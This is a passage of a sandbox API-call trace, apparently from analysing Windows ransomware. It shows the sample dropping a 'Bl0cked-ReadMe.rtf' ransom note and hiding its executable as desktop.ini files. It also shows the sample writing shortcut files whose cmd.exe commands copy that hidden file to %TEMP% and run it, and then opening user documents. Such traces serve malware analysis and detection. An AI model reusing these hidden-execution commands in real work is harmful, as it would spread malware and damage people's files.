lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0135.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0135.281] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount1=45, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount2=27) returned 1 [0135.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0135.281] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0135.281] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount1=45, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0135.281] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0135.282] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0135.282] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0135.282] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0135.282] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0135.282] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0135.282] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xc7c, dwThreadId=0xc98)) returned 1 [0135.295] CloseHandle (hObject=0x110) returned 1 [0135.295] CloseHandle (hObject=0x114) returned 1 [0135.295] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf")) returned 0xffffffff [0135.295] GetLastError () returned 0x2 [0135.295] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0135.343] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf")) returned 0x20 [0135.344] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0135.344] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0135.344] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0135.344] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0135.344] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0135.344] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0135.344] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0135.344] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\") returned 0x2d [0135.344] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0135.344] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0135.344] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T") returned 0x2c [0135.345] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x16e | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x16e [0135.345] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0135.345] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xcb0, dwThreadId=0xcac)) returned 1 [0135.352] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0137.273] CloseHandle (hObject=0x114) returned 1 [0137.273] CloseHandle (hObject=0x110) returned 1 [0137.273] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.273] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.273] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.273] GetTickCount () returned 0x2b52b [0137.273] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=19406272539) returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x63\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x42\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x67\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x44\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6f\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0137.274] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.274] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0137.274] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0137.274] CharUpperBuffW (in: lpsz="explorer.exe \"u7E2T\" & type \"u7E2T\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5b | out: lpsz="EXPLORER.EXE \"U7E2T\" & TYPE \"U7E2T\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5b [0137.274] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0137.274] CharUpperBuffW (in: lpsz="explorer.exe \"u7E2T\" & type \"u7E2T\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5c | out: lpsz="EXPLORER.EXE \"U7E2T\" & TYPE \"U7E2T\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5c [0137.274] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0137.274] CoInitialize (pvReserved=0x0) returned 0x0 [0137.274] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0137.276] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0137.276] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0137.276] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0137.278] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"u7E2T\" & type \"u7E2T\\desktop.ini\" > \"%TEMP%\\cNBgzuDo.exe\" && \"%TEMP%\\cNBgzuDo.exe\"") returned 0x0 [0137.278] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0137.278] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0137.278] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0137.278] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T.lnk", fRemember=0) returned 0x0 [0137.286] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0137.286] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0137.286] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0137.286] CoUninitialize () [0137.287] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.287] ReleaseMutex (hMutex=0xf8) returned 1 [0137.287] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.287] ReleaseMutex (hMutex=0xf8) returned 1 [0137.287] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.287] ReleaseMutex (hMutex=0xf8) returned 1 [0137.287] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.287] ReleaseMutex (hMutex=0xf8) returned 1 [0137.287] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\UzyEGr8akjufgS.doc" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\uzyegr8akjufgs.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19407727850) returned 1 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.289] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x12c70 [0137.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.290] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x12788 [0137.290] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x12c70 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 